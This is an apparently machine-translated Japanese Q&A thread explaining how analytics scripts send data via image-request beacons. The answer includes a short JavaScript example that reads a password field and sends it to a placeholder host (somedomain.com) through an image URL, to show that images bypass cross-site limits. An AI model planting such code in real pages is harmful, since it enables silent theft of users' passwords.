Google アナリティクスや Clicky の仕組みを知っている人はいますか?
http://static.getclicky.com/jsファイル全体を検索しましたが、サーバー リクエストが見つかりませんでした。自身のセキュリティを損なうことなくデータを送信するにはどうすればよいでしょうか? そうしないと、ユーザーが js を変更して誤ったデータを送信する可能性があります。
質問する
891 次
1 に答える
5
画像:これらのライブラリは、必要なすべての追跡情報をエンコードし、それを画像 URL に追加し、画像を要求して「送信」するトリックを使用します。その画像ファイル名のサーバー側の解析により、情報がデコードされます。
mydomain.com から somedomain.com に送信したいパスワード フィールドがあるとします。
<input type='password' id='p' />
この JavaScript は、クロスサイト制限に違反してコンテンツを送信する可能性があります。
var t = document.getElementById('p').value;
var i = document.createElement('img');
i.src = 'http://somedomain.com/imagescript.php?p=' + t;
クロスサイト スクリプティングの制限は画像には適用されません。また、JavaScript で画像の URL リクエストを作成する場合、すべての可能性を説明できるブラウザーやロジックは世界中にありません。GA が倫理的であり、フォーム フィールドに引っかからないことが幸運であるとします。
于 2012-06-12T12:53:04.913 に答える